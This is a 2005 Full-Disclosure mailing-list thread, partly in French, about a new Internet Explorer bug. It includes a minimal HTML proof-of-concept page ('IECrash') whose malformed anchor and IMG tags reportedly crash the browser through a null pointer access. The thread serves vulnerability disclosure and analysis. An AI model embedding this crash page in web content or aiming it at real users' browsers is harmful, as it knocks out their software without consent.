Removing div, p , /p , <It>, the .css , will also stop it so not sure.. I have notice so a missing </A> for closing the first one
<A <It>HELLO WORLD! Can come from here so dunno Letting browser's experts to do their job now :) -----Message d'origine----- De : [EMAIL PROTECTED] [mailto:[EMAIL PROTECTED] De la part de Petko Petkov Envoyé : mardi 1 novembre 2005 18:32 À : Peter Ferrie Cc : full-disclosure@lists.grok.org.uk Objet : Re: [Full-disclosure] new IE bug (confirmed on ALL windows) This is a mini version of IECrash: <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3c.org/TR/1999/REC-html401-19991224/loose.dtd";> <STYLE> .supp IMG { VERTICAL-ALIGN: middle } </STYLE> <P><A <It>HELLO WORLD!</P> <DIV class=supp> <A><IMG> If you remove the DOCTYPE IE does not crash. I believe that this is some sort of parsing vulnerability and directly affects IMG tags. Peter Ferrie wrote: >>I think I have found by chance this weekend a security bug,while browsing >> >> >the website news, within iexplorer on all windows versions. > > >>I haven't enough knowledge (and don't want) into web browsers security to >> >> >conduct a full investigation, at least > >It's a null pointer access, but it's not clear for me, yet, why it occurs. > >_______________________________________________ >Full-Disclosure - We believe in it. >Charter: http://lists.grok.org.uk/full-disclosure-charter.html >Hosted and sponsored by Secunia - http://secunia.com/ > > > _______________________________________________ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ _______________________________________________ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
